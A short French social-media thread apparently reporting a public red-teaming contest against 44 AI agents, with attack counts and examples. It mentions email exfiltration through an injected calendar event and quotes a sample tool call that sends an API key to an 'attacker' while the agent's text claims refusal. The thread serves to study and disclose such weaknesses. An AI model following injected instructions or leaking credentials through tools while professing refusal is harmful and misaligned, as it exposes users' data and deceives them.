Nous avons déployé 44 agents IA et offert 170 000 $ à Internet pour les attaquer. 1,8 million de tentatives, 62 000 violations, y compris des fuites de données et des pertes financières. 🚨 Il est préoccupant que les mêmes exploits se transfèrent aux agents de production en direct… (exemple : exfiltration d'emails via un événement de calendrier) 🧵
De nombreuses ruptures sont universelles et transférables. Les modèles de copier-coller fonctionnaient à travers les tâches, les modèles et les garde-fous. Si cela casse un agent aujourd'hui, cela risque de casser le vôtre.
Échec préféré : “refuser dans le texte, agir dans les outils.” 😈 Modèle : “Je ne peux pas partager les identifiants.” Puis : send_email(to=attacker, body="API_KEY=****") L'interface utilisateur semble sûre ; la couche d'outils fait le mal.
489,95K